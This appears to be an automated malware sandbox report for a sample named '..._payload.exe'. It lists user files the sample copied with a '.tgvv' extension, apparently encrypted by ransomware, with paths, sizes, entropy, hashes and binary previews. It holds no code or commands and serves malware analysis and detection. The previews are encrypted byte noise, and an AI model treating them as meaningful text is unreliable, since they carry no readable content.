                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):67060
                                                                                                      Entropy (8bit):7.997415835854293
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:fn3i+K3m+WQuZlWvnHV4bGxasGw0nTMFYNdu8l2dUsaOWB0l:fy+KNuqvGCzwYgcnaOWB0l
                                                                                                      MD5:A6D8EBFC5E6EF0AE60470F22BFA75CF2
                                                                                                      SHA1:8B01616B8B68A77219540E3C53654EC44B6F1D88
                                                                                                      SHA-256:20A22F5EC21F3920D41C53BC4CF7DB26C45F7568E262FE86D3920F5486A7521E
                                                                                                      SHA-512:642F41E087B6CEA1432C22BEFA7766B72E5FDFFD8ED9C7A84728C61CC5D73E5C3FAC01E639EB9D06B7F8AFE0745E7C6C556B0BDD9DC12FA9FB3F0C7F131BF480
                                                                                                      Malicious:true
                                                                                                      Preview:4.397BrwO5.......{....s..e...Vf..R.U..~..G..`..:3....K.....+.vB....>..i..... ,H..>!:..K..h...DMd.6.....4%..g..8.\/..}..PX.....#.......B.Z..Y........}.....L..p...r....^.Ex..(J..O.T~..l$......<HSG4dk..g.J..}#..Al^..^..F.z....h.M......)x|......zGb...\.8...5......|_f.|.]b..[h...5..{..7.u....?sk5........i......SR.y.......b.......K..u......>D........e8wI...?OPM...A..2v..<.P'}..V.L.2...Zb.e..y.k.ql...e.~y.Z..(.....sb..^....p..r>"..#.I:Gx....6j...o..D...*E^d.'.i-e.E4..W..ZgU..z`6.PB.w....K4..a.+.p.,O.....a=.6."{o...d.G.D.N.!.E.A.|....O%..`..a.tqo.'....j.(v|....L.".$g.c.A...0XL..v{..o.$*.....A...#.6..1I.T....n........%...`...v^..0'...k1.nqZ\)f..*3...A..?=W.....c...'........H.N.....viF...qB]..`.=.'#5..f......!..y4......D.\........Q.^..f.g..v.....Z...JI.01...j.q......l.dfB}9X.p..MPz..X..?!....#../5a.........Kj!...aE=x..:.=4.z&.~...&.)....G..;?.U.3.....`.L..&.A.;.-n.X...%k.gz)..}B..ZeL#........K..=..K.o...V.6...!oV.p ..c.*.....Nh...~...@.@F..

                                                                                                      C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):932
                                                                                                      Entropy (8bit):7.739301135890954
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5tDwpZar4M2dyyzKnui8xSAnlohxAEGFBv6bD:5tvr4Mieui8xSmIGbwD
                                                                                                      MD5:0FB5CAC69C3046AF5C79EE591E62C1A7
                                                                                                      SHA1:AEF9EA9D71F6B3BF791723590D02251E47502AB4
                                                                                                      SHA-256:62B2836FC006BE511762CF303AFCBB0FE1CC85C791425366572B58B83D3D9C41
                                                                                                      SHA-512:BAF4C05CE87A9E8E03A1463967134CFC15E69DD89646F2DCDD5BB7973246893455EA256FC65955557F1DAB42A26AADB5FB52912E02034475AD97708F6942802C
                                                                                                      Malicious:false
                                                                                                      Preview:CPSA......r....m#Tn1.wL..w...7=..c....~l"...8P.A..i..D.Li$.7....\t...Rc.D.8..6.z.........Wb.D....cw.!.pu.,...Q......#!~...;..Dw.;..c..b_..o..s.zk6F.!..I.c.y,..jW.i....Y\..~.FB.G.."'q1H.h#.O:W.o,.'....bF.D......b..........cE... s.ETO.P....o...+.c.Yc.'.~_...OH.9.*.%.V.G$..%._.Bi.....So.P]{...#*...ico..7....".......Y%..M..v...q.:...Z.....k...J.xd.>.Z<.....jE.^o...E..c.,.*&/$.....S.b..b!.i$.....W...Lp..Qg.m.K..e/#..t.XZ..b.%)BLv...K...C...m...C.....%....YO.....~..U.....Y.p.t..A...%.k.%..3..D..RE..9.L6 .d..W.....c.....Z..V".wbd.M7-.b.Zvk...._..x..........+.g3!.D....jbOI.........\u....p....._M...}..\..yv....|l.u1be4..a.}'..T........p.5{.......W.c........+.j...VD..X!...H......j....o.m...y..7x...j..z...*........$....y/|x..4Y.^B&}o.6^1...Q:.X.....;.a. ..W...#.b{k.).R\..8.#!.5....^.....:...9....._...."...|....%PhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.978193943533357
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ddVBVVawwudU4bZRvunQKIdjwngZKgrxgr:dFVVbNbZRvunQKGWgKgtgr
                                                                                                      MD5:E0E7F7E6016E518A724534B027766641
                                                                                                      SHA1:F6724D9C4875D4E2B1C4D1BACAE9718BF7D57265
                                                                                                      SHA-256:D71262A320CC4E3D8C1C3E22A522B089685DB0DBFAB203C5CF9359E3F5DDE90B
                                                                                                      SHA-512:454ADA1AE555BC718FD403144631423CE908F06F361B51CD39781CFBD0C6D3EB78BA381A12EC9722A151A2F3A135B3AC8F15F8A34C89DF000121CDDF72CB447C
                                                                                                      Malicious:false
                                                                                                      Preview:.M.#....>..[..*...lO..}...BI..)W...T&......q.v.".CR....&b0.....6....Bs|...p...U..~...B.. .....Z...A*.8.r.I..Z&K..l.G.d..ed.]...r.hQx......._>..X...Xf..f3...f..m..u......,.A..1H.Z.@.6Z=.-..h.F'0..].......9bk-2+.bqbgI...M...L.r...mz.,.A..g89.......*,j.qN..R..F|...+.K.z.p.....[./...O..u....{F.on.0.t..)...%<..C.ML|.&X`.}.o...J..N....G?e.........?.._O..`Hi.U.u.6"].3.h...9."..9.mr... ...\w2"......3S:3_...U...NX..&.2.^.t...u.N`.1w:Z.|..g..PZ!....zw.....|...A.Yr....H`....v3.ru...tKV..a..j6..<.....7J.a.....e.....p.E.....jD.3......J ..t.......h.C.2Y...._.+.....[.........b#.lA.....Y$ul..4..r.y..y9..J }hn..0.Yz.g.Oz...U.-jk.e. .0...."......:.c8E"0..A"U...|p.x..B.o<`..>....b....Ev..CT<...RFM..W...YD...l.I&...M.#....\I.Nd..6\......]........(.x.O....R.n.Y...av......^.)...WF.....n..t...r4S......U.+j8!.i.........D....mb\.....f.K..K."A.......\.amD.c..^E...0.......|9..%.mT..v.a| .r....FE8aA....B1...$.e...xk...P ..I..or\..`.;..6.!,. .D.kD.IJ(.A...>EjcR^.h.

                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):1.7334840268827456
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:bmen8QVrjrZeetXVCxfUIMio3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXZAcbBg:Se8cngetFCCnyfCdYS9
                                                                                                      MD5:DDB568A696C45A22E8309387A77A2F13
                                                                                                      SHA1:A3BAECB811798D19767F00A74B3F3899A035660E
                                                                                                      SHA-256:5B2E34E45DE8248C2B4A9832EA07C5BD6EEE61C577A1576F736DEE8D8BBE58FA
                                                                                                      SHA-512:2592F0C7E9AB99D6DD9A9D21660248CE2602F696412DEB0604183421CC64D88AECEFB4CB560241FEA47427656A242CB93E9B897BD6DBFF50F7B09C64DCD9C307
                                                                                                      Malicious:false
                                                                                                      Preview:...?.-..By.......LP..s.....#.%.....%.<.D.....C...68.f8aGz..SIp....M..6.XSa..S..z..\5.e.(evf....1)....2A..{.....vE.%...{7J]..u=.ykD@..LF*&e....Bb{LG7bg"..}M|Ij.B..tM.|g...3cs......@V...[.j#.n.....TV.e.;`x.H.M..)..?.H......(htLk.#7`.G........=..W........+.^Fo......a..c...6.)j....<n..z..QfSL.gH...\/.$VVId.2%..... .....).......MP.v=.%.......A$9~&IW...D..6.Q..d.j.l;...'UQ.1E....P.....$....2UA0O.k.4.0I.L.A...3.W.]n<I.0....Y.N.....{..X....0m.Z.[.a..v.s..+..6e..N....{2....rJ........D.....r.*.^G...91...2...68....p>L.....Z.....C........8o^.9.og.|.z.IwO.|.jG......p..'.%%Bz.,N.c....>...=p3S..\..4r....h.b'......Q`.o..{.'>4MzK....T<..(iu.6.....t....o.,g..........tg.A.A.".;..F,..M. n...k......C[..X.m3U..:........DfEJV.I-.S.....G.V..B"......D..w}.a...o....6..R.!......z...................h..3...;.wkq....WqT....m...L..} ....)2......JM..1.......4..1....;`......T. +...[.).9.i.K..)....R$L..W?..N..>...'.e..XU..d..j^.BpJ.c...)2..<@...............i...>..

                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):0.6706240792439269
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:NWdfRuyliwysqhyRX3ilrMYByw83rmx8SzE6NQMRBKUBcbzxvRKh:WJuw5BXgrM4i3q5Q6NbzKUB+VvRq
                                                                                                      MD5:1ED2491D668A7D0A8DCFF80845E12D14
                                                                                                      SHA1:71C5E3C05EAF6CA7F8D3B40A9066DD3EF3EEFD10
                                                                                                      SHA-256:2ABEF66358F19CAFDF70F75268BEE3B44822928A461601D4066D6811B3F5CD31
                                                                                                      SHA-512:80D783B45535135E1A1AE7CF977CB166811E261E9680067E87C6B15F4D779723A5DB8E2F6A54DE77CEAF83F1CAC7892935A572DECD5DCE0D2ADCEC80D7C7C307
                                                                                                      Malicious:false
                                                                                                      Preview:.....tat..8.....7.H.24.9..+.F..Gr....7.P+....)5N....A..{.:8...p.{..I./....M.T,....1......(.|.....k..U7y.wQxB......GI...Uu}..T...# .\...nw...._..^p.u.......[^....l@..*....[.;..Ox.L.+..l..J8+.9........>..`..v.1.(a?.S.p..bx.cu.P...._....HU^@)X.0.<.......c.._r.[ey.....T.h..>.l^4...A.....@)#..$.... .l.{.I$..".<.....AK.J.V........]1.".+c|f.....XB.J..P.U.UJ.0*Hu.8._,a..~...........P(...CLU;a...k.F. .Y......vv.@..hE...%..7...NO..[.=...s{.O(.="W........Sq<PF........l..r.YV.5...?.-{.1.'...O....R..+.%.i./.VC!.G.3`..XL.f.3..f..Y..9....Q...?...g.7.!..2.?..k!.e...c...\.{@.RQ.%..2.O...z.h.......'.%.b2).!7.p......v..S.....8...mLw.;.Q|*...s..{&....r.0.[. 'a/........O. ...n....\V.d....e.C........5.\.@....)..;.B..y.........y..{..>...X...N...>...?.......d..}.r..+..|.N.>.B.....x&...p.U......[.Z.....D.%.uw;.X.{.k..1-......G..H...].m2a....D......p.....e..'.zI...,.{.....i......CSVji..Z....;6..e.oxPTE:#.z.NY#.[...........!.qA.l.1..w.~.WU.F....k.)..D.+n.....O...R.q.

                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):0.6707000431648776
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:cRo0wbwHg/euDJygUMc0VNHaVVOY4e1/Tg7ys9kEXS3U9ddvHV4toXAj38:cRPMRDkPEN6VVtJNDDEC3GDl1
                                                                                                      MD5:AE6BF6F604BC02F88CD2B620E493417E
                                                                                                      SHA1:13BC29BCF7E74B6FEAA6B3D7381B75C72279309B
                                                                                                      SHA-256:8FE1C16CCEE3B7FFA2AB647C153875533D6A7D68F42E12171B7F11E3CE60A9E7
                                                                                                      SHA-512:A30BD56CA2069C016ACD1CB19F47DB15987B0DFF2DA6C69E8F078F21CEBE029908B7AA9EEC891DB84B199819A2778C1E61C25A51A1805A07FC401EC7F9B0C4C8
                                                                                                      Malicious:false
                                                                                                      Preview:.........&F...,..........!~..=...4....m...x..n...Ec.....or6.h?.(.X....L...%..eZ92...z};o..z..-..)...Y?...2=.....Q.1..q.-..v...m.W<"W.#tH.^>%.........w...k...$....!...u..5%...B3p...K.u.s..;...|.!.H..|fD..B..'...X...{U..%C...v.......5j...].X..S..9..1.#p...yS...T....9v.....;..M.ZB.h..L.4<..D....Z%.k,v.$c...#.t.f3Nc..j......t...B.....8.~.G..*..M...3....",...M:..63.yp.F.1..:.u~....V...*.,...H.v./H..R>.2.B.^d.&sX#...m..k&..A..%....6.\y?6.nW$=.!.8.:.jz.....?.......FK.-........r...IyJ9..X^..........(.Os.c........Xh.&|G....K...D#[...HM.:_.*.7.....wr....`..S...L..o.i/...5..4..7.<...y;v.0....}.P....G@.......W*.]...NJ.?(..b`..9..F.%...pE..........Y....f..v...W....Q.y....+..>.-.... ..$..M.2.yZ.H...OoB........&.f.p.G^V..k.A.>...i7.y.KiIt..G.?....N!W\.....c\.P..cr.;....!S.."...\...3..I.y"2..Y.X.X.D...I.@..a.S.....4Qu.X..#.,.CQ.../\....xKU..j.E..B.4...0...JtA.r......v..l.W+.[-...G.U@... M"...i'6b".......cVP.qe.....H~.......j6..[..........0....hB..r.6.`

                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3146062
                                                                                                      Entropy (8bit):0.6706082601705625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:i7+e4b4gtSzLH0sD6tROnoF/ioEUvK5WVYsRsglk+r/Nyu+q6RHFbnG2k2rv:KuS4HOnkaLQLH1rNIJFrXT
                                                                                                      MD5:DBC519DA6DEA2BB8D7B43DC904D333B0
                                                                                                      SHA1:8F66161E15F41138D71685721144F71D18FB64AE
                                                                                                      SHA-256:379EB11CC060DFB19393CEC6BDEBA2539D397CF5D2C9DE71A68AAAC0BEB6B382
                                                                                                      SHA-512:BAE0702A9D3CAB453EE72C900920E5DA06FB5310C044107CA28FB688140F41888B7ACBD8315DDBF9889AC707E3119200013B2D524A2292DBD2B426383BE11541
                                                                                                      Malicious:false
                                                                                                      Preview:.....dg"?AkA.#r......j../..+....!.....0G.....d0....L}....1...9.S."..,)j\...........".}.#..Y.='R;.3D.3........7......d1...1.g...@....../..\..f..f..M.......tU..e.m...Q.r..........0~7.X[.l?U.)pC...<....Y#...r.#.....Z.u...|...]..h..jL...B{.........8..2.|..r.t..b.8H9Z0.........M_U.....".Wj..^.Y.%...a..,-.v.Ww.[..v..]t.).&.A...w.qm..>.$jz...e..W\.X.P../5:v.UP.l....K..........&....a.....c..l.|...C>.....~&..VX,8.+...>U....HO.A.w.....V.......f.....l..4)O^o,.......-@.;~...Y...'.O...!)M."9.Q.#...r..|.....f.2..A.]'..e.;...+..J....$\&....i.n..~..'..`g..LK.0Xpz..........(;.9..`....(;i...l.<.r./`......I..].}(i. ..9......RD.5...Q.r*.E...eb.Q-..^,Kjf.l.%.=.}.5.\8...&..&.s.....@.h...Q....F.B.)..aN..9.`.n.2 ... .5......Qi..fl.%>S.....0G.e....\4..zK.,.u...b....c.e.F.^...!rS.6]..i..6.O7.23.O.W....1.>....p..R....X.3.B../.+..3n)..@.0qna....$M......?...:.v.Z.=G~@..C........gRJ.`&hR.'@".7/...O.x.l...".j..>.......\I...e..%...j......9m.nDvo...i..0a.....]..+.",.....e

                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.98875823475148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:ljsivoY/0AD8te5YetUJ13Ql7/d+oCsxsjdPz4YzIA:xvoYcAACEJ1GnCj9z44h
                                                                                                      MD5:39C20448F5BFD0B0A21C82BF46E62A56
                                                                                                      SHA1:F64EDB7C1E3FE99EBEF440D67447065539A8BC9A
                                                                                                      SHA-256:4C0898315A99461E9A994DCB175FF5EA554F9F0092DDFD733DF3C5567071F3C8
                                                                                                      SHA-512:178F339CE896C915B13DB8C07571B3990134EC6D49D376B8DA1F8B6669E6AD388AF389A3C9FBD388E4C868B1DDE60B7030303CB5482B9486185DA75D7583C847
                                                                                                      Malicious:false
                                                                                                      Preview:.....Xze. ~gP.#$....].....u.|..;4....A.9..2tx)...y4..):...c..@.).,&..7.|X<..N...G5.......aK#.....5.~.(.....f..!...^!YJ.maV`..........r.uG....[.8....]..d$.#~.d.....-.i.c..b. o".0. C..J....V.U...K.u.wp.qsI..y...2P.X.eO...%....([..Z{fs.....:GX....!......T.}..u*%..u.......>.?}..9.q.ZE$....q.l'...v..+qA...D.%....+....g`.Y..k...8..TF[...J..%.%U...'..3.LL.c.F.&....tPN...!....p..R..2|.Hx.......8t....{.......5o..5..kf...Y.[..g. &/S.B..O...HQ.nu..c.b.K;.w..aJ6.S...=.eK....0.....H....~...8....k".o...\..2.xQ.k..n^.:.Z)O..6..z.!Q.F...e.<`..........u.Iyx.=.....j.t..c.-.E3....a...Y].1..U.b..o&4.4_l.g...<S.V..G.z?."..E.......v.4+.....TN..l>.Ui>MI.....(...X...T............z..@.M}aSs|........f.....f..h..f....^....b.'c:...8....,;.....d^]..'_.}...7.8..]........+m.....E...\....(9.,.^..?g..M...a+.##3....S~...kMSq.D...HH...o.D(l..M...t.9....O*...7..D3..y.7.......ND.,f...P....t3...~....}.T.J..A.....5.^.#....Tt.Q.N.....D+..j....y......r/........v+..~...

                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5767502
                                                                                                      Entropy (8bit):0.7568165707626029
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:orBJ9G9nynEXXqOM6H6hpXOOQ40BTlZVSa+d+gOrOuWxWk3m+cun4CfYjUfSUXiE:orlmn1XUaJJ4+3iR3b0a
                                                                                                      MD5:FE224EC3C8735E75F1A2050520B3AE58
                                                                                                      SHA1:EDA1708E4CE9D9A6F1DB778647A1F4CAC5A96956
                                                                                                      SHA-256:21F8B67341F8CBC309F3FE356992999DCA542A96AD56A77875A2DCC437904B83
                                                                                                      SHA-512:99C0190E15E8C857A919660B985AA2172E06DF4C3A74ADB1A326BF651083C5443E4EF4179180A2344A437B98126FDDC20BFD9ECB166FC505595A1CFADA030A9A
                                                                                                      Malicious:false
                                                                                                      Preview:....'..z....H...;h...<.F$..........&.......n....~.x.9......&e.!....?..N.8.52....5cl.."<..!....P!.n.hE. ..e5<.......I.V...o.....(I.\-.x..<.6...S.H..K....@-E....$..............W.M...A_8........,OE..yj.jx.v..y3.RDh.}z.`....3.x{fw..PA....B.!.;....=.$..D...F..):.EA..x.#.uU..3..A..<...j.oN.o.(...Ix....&k.^A....1.8...Fi.6.|..$.......V......-.(........)b.r.f...C...-..h).."+.#A.v.-...`.A.c..@...~/z.r..!..4=..*.........AOZ....n;.%.N....7@.}...!...........c...m...:. .n..I5..6&.......;.[<).....V..-....fe..]........@9..Y.^o..@F.f.Y.....V.jSd..i.#.....D#..b].zy...@.....g.?.C..*zm04. U*..Jy.9u..5..u_.*...]./jMB[.b*q..<(X.|V^d...IwF......D..pR~i=]..PZ.....k......=.!E..n.2...Z.......|..m.....u..8..^/ij50yP.('...%. g..:...,...dX.z..YN....#......K....(...;..Bq......5LT..,_.........EI......3.....@Wf'.x._O...K...Mc.O.[..D\y.N.2.C.>.V.N&...Py^g=......0b..Q..l.#{p..h.Gy....F3\...R...?.~...R)..G..F=..*.?*85..?h.{..r.z......,...>].'._A....(b..c.T.C.R..%3}.%+

                                                                                                      C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49486
                                                                                                      Entropy (8bit):7.996385318955644
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:bsLOJ7V+BMUMIcdaK2q3rTDeqW1V7HCO4R:bX7wSISf3ObwR
                                                                                                      MD5:7CF2124EAFF1B49F1708842F17ECF3B5
                                                                                                      SHA1:9733F778629FA54B5E72595FD76A0E8CD1AED120
                                                                                                      SHA-256:D27BF567D5D8DD04E593B29CF50DFDE6A0960B7A7C7C551EFC749FF513563AB9
                                                                                                      SHA-512:6D48964BBAD7B7152CE0E5514F2116FA332055AAC0CED7B8897113779F4C50E1EE309354ED2161110295CAC04495ED898B44EF1379EA6A8E48BBA22A92986CEB
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit...Z....=.H..)5.o${..|.P.N/.xE.E.......?.FE......X......B..b....i].[U..R...;.O.p.v...BY.%~.M."...<v_`.<.>.;..e.U,t.%.2[.`],.:..)..>..6...{..?....-jp..5Gj....f.....!.....F.!..L..f|B.f..9.z.t!v.....h'..-....?.i...|.No@...~.$..(....Qf`...V.l.L.}...<`Z.....U.O._.?.....Up..W..^.eL.............1..I....F.nD9.i...Xn=.8...j_j....4...U.E Vl..}^...hV..L<..2|G.....2...Y'W.:.}..V..W.r..mbf2.........T...."....B.<7.T...P......"......=J.Yp......fme.Q...y.....B5.Pz9......c...00i...-.:. 2.,q.@ZH.;.;._w...h.G~y..../i....G.\!)........M....`9>......&+.v.Q.0\.P%..usA..Di....qoO....<....~.?...X.uj..u.._R.....]?e..1.....|.z.*d.'h:B~q........u.I.v(......(!.......W..{..H).U.P`.yU}.?....J.P.:K...T./.....~.'.....d..%g.,.Z..`./+..;}....C...Xk7.1..O!........V......P.....q...Qh...6?JO..~.k..y.........r.F5.u.se.....h..!.._.S..C.6...T"z.|z......$.>vq.G..#$83..h......X...D..%..Mh..P9.L..j<$...6..%.Z.M..Ku8.........`$..25.... ..p'.F%.<..za.....T~.Q.t.ZV<..A.#W.....@1=Kb.Z

                                                                                                      C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):354
                                                                                                      Entropy (8bit):7.354891313027574
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:QRmuin+i5pBsFqr1MB3JeguOPr4STCzcb7OnpnZoxqEAonaox2+i9HpEOBNJ8Frf:Q9i5PlYQos0CHnvoxq0OHfEOBUlhinvk
                                                                                                      MD5:112C913AC20DC5329BEC7A57A5DEBBC6
                                                                                                      SHA1:37F25E5EB1173677707D4CB265734FE7995C0E9C
                                                                                                      SHA-256:8FCAB256F7C4BA8136CAD2466509BD6A5329964C916A7AE7CFEE7E38AB72BC10
                                                                                                      SHA-512:871F23D461CAF663795ACDE6F0731CDA05BE112A58ACCB47BDACF3ACE55ACFF89736C37D88A2BC045D930562EF5037E808762D1BA7DE651A517BD000EE6305B2
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fu...../.t.].Y'i1|PM......uvG.....z?..ec7{^...&...:..S.}.u.{<.[...:.....MSx~.6w....K.....^....L._K.._g...LK.|......f*K.h..F..V.v=.r....$.G...aM.(B%t*....=.9.3\..c..Y1.-..5n.kS.yx...i.9v.Z.N.....2.....A.......rnna..a....<.`..d.$W.#...WPS.){.+5.?S...3..Q...4.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1210
                                                                                                      Entropy (8bit):7.821236733660461
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Fy/Ry71tXwdrSlbWFWV9HFOk1qWkSE7+PaG92LxCiUoYv6bD:FMy71DQs0k1qq7aqQxVYwD
                                                                                                      MD5:8231D86C60B04046AD319E4243650A90
                                                                                                      SHA1:41AD712D15B91E1EDDD95949976E5396342B3121
                                                                                                      SHA-256:36D573BAD92F907325528C971833824BB08A50DB4B7FBCF779AA399A3B08DCD2
                                                                                                      SHA-512:D3ACC440E39A2C0A3FFFCCE4D194C7001FEA42E04E5A2CE9CA129D279CE9AC340BC3B430527DB7884CA86E6CE2BD50CEADE9D382770E60804383D1B7293843E3
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fu...Y.3R.^E3..&.SN..PA...c}.0+....hA`.{4P.E.d.].....G.`...<&.E.>.<.N...74.0......!...$......\..]....t..).......S....F.@.o~.....j...n......o...4j1...\.YB....H.di.....3...U..........k........$^..4q..;..]q..:.........M......x...3....!...c%....).N....u.....S.D..X]..ET........:....U ..jB.zY.....7v.a'?.`m.I......?.."...........f......-.|.7.?o(.-$3.a.e...k..R.).1y..'.mB.;k...uO...YgFD.....~....,.6.R.4.|..!K....^....(.)zM.h/...vm.S..D.~.e.."~..<fx...-....#z&Mt"=.....R......*..X..2y&T.*2e.k)g..k..*q...v..v...]...,./......R.d....2.......j.^......K...j%.,l:8|.e..<.|.\5VO8.&(RF...}....;..m..bw.!..r}}..?....M....l.-&...q..7..M....r..l...8....r....,(..B...d0/....`....o...E..u....+.^fF.,...6q...9q.M...P./>.2^......+.\[t.Qv..8>6{k...r.d.3.U.D...C.e@9...D..de.l..f...c5...m)...3.*F...T9l...:.Dgp.A9;)..}.h.(.(.1e.<.K....Evl;>...,.:.2v.N.......%..K..4....a.-. .Ut.u.....BR..CS......%qH.~...N*......|..C."._(..LM V^..l...`..........'.H.~.@k...!...5.Q{.9+(.V.(.

                                                                                                      C:\Users\user\Local Settings\Microsoft\Edge\User Data\CrashpadMetrics-active.pma.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.988196790400042
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:RdfnYTsGwEOR+H1Lvqhi6x/ydCALct60GeVyl80bd/IIa+PCOgACOpBq:RdfnYghcH1vqhxWCFluvbJIIaE1dC
                                                                                                      MD5:9C32E0B044CA791E31FF11CF5EBE29DE
                                                                                                      SHA1:4CAD318217C8A3EF2546D1FDA6FD2F717A309A40
                                                                                                      SHA-256:8991846BA4C435D5CBF2DFCDA17619A1B107BEB3183748A117C619274B220767
                                                                                                      SHA-512:66ADBA57C7BE75BA4EEC8E3CBB902EFF5611F3809F8ED81DE33957F66C7AAF3C33A0399893CD4EE233EF2340AF6E084351D54728D77753F0FE2EDDE18C022DAA
                                                                                                      Malicious:false
                                                                                                      Preview:...@..\>..W.d....zuo..w`-mx.PY`gM....h.]...=Z.*o...x}.=..7..$.|.T.l.q.r.!9f9.........{..b.. ..g..;G..ab'l.`.m...Mu.u.(g.......D%."...T~.U..r..>5.n....C3`.~.S.".._......ME*..T..}i...3.^..;..........pe....m.R...`.h..~n.*......R..s...!.............;..i<..!...y4lA.B.<..C........1.D[.t..`.......S.....K.|...:.S...x.....p....#/.`......Y....!]......x.n...zT..".I.......X..N.d .="..(h`......v......C.......c+]..AT.E=.X.M.G.....[.b....vQ..g6d..X+<Gc......L.....`...+S..X.M...JA...D.....r.Q.....!B....@4.bu.....L..z.s......5B.I......wi..*....#5.~.q.._.......V^.'.)..2..o.....Xb;%SU.HkI?....#.h#"z!....?M..Q.[...R6~.9.E=|..........F%P;...S.g...?...XT;.....s....,.7............j......F...D.M>..;(l.UK.5...@.......h....I.5..X^...m....^6fu6E...0...*....!.....ZTk.x4....._.../sFR.VPC.G.V...<.Z...=t....9....2)_..W....>93...C....{i.>...v<.......=.o....&../q2.]..p...qqn...`....H.....|.=.F.k.0..,m5.v...LR.z..?/.......[...|...95......0Pb...r>...tyOC...wP4.s..q..t.*).

                                                                                                      C:\Users\user\Local Settings\Microsoft\FontCache\3\ListAll.Json.tgvv (copy)

